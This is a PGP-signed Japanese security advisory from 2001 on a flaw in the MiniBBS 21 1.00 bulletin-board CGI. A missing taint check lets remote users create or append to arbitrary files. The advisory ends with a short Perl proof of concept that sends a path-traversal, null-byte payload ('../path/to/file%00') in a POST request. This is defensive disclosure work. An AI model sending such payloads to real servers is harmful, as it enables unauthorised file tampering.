-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

======================================================================
CGI PROGRAM SECURITY ADVISORY  [MiniBBS 21 1.00]            2001/01/20
======================================================================
http://www.ansi.co.jp/cgi/security/advisories/minibbs-21_2000_01_20.txt
======================================================================

■ 影響を受けるCGIプログラム

* 簡易BBS 21 1.00

■ 概要

簡易BBS 21 1.00 はレスキュー (Rescue) 氏によって作成された掲示板CGIプ
ログラムです。このプログラムには外部から任意のファイルの作成・追記が可
能というセキュリティ上の問題があります。

簡易BBS 21: http://www.rescue.ne.jp/cgi/minibbs21/

■ 解説

簡易BBS21 1.00 に含まれる bbs.cgi では、ベース記事として与えられる番号
に対する汚染チェックを怠っているため、追記モードで任意のファイルを開く
ことが可能です。これを利用すると、CGI プログラムを実行するUIDの権限で、
外部から任意の名前をもつファイルを作成することができます。(ファイルに
任意の内容を記録する方法は発見されていません。)

■ 影響

CGIプログラムが各ユーザ権限で実行されるシステム (Apache + SuEXEC など)
の場合、そのユーザが所有する任意のディレクトリにファイルを作成可能・任
意のファイルに追記可能です。そうではない場合でも、CGI プログラムの実行 
UID で書き込み可能なディレクトリにファイルを作成可能・ファイルに追記可
能です。

■ 回避方法

新しいバージョンのプログラムを入手して入れ替えます。

■ 参考コード

#! /usr/bin/perl -w

use LWP::UserAgent;

$ua = new LWP::UserAgent;
$request = new HTTP::Request(POST => "http://host/minibbs21-1.00/bbs.cgi",
			     undef,
			     'action=post&base=../path/to/file%00&uname=xxx&email=AyuMoe@JAPU.ORG&passcode=10637&value=puni');
$ua->request($request);

__END__

■ 変更履歴

2001/01/20: 公開
2001/02/03: 参考コードを追加

======================================================================

(C) 2001 ASUKA NETWORK SERVICE, INC.  http://www.ansi.co.jp/
         HIRATA YASUYUKI              http://yasu.asuka.net/
All rights reserved.

* この文書に書かれている内容は無保証です
* この文書に書かれている内容を利用して攻撃を行った場合、刑事上・民事上
  の責任を問われることがあります。
* このファイルは内容の変更 (電子署名の除去を含む) が行われない限り自由
  に再配布可能です。

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD4DBQE7rqeEduP2KhBu8ikRAmJXAJYu4JIxkcaW/jMZKBDezt5KTZY5AJ9q69if
5mhHnElfzdBHqHdVyKY324g/AwUBO66nhMKK1plfHN0EEQJiVwCgp84EFJGGjA5B
j2WKceScMnSkRVwAn3Fi+H8ktvr2gnad1D44N0MOHGcf
=0H3l
-----END PGP SIGNATURE-----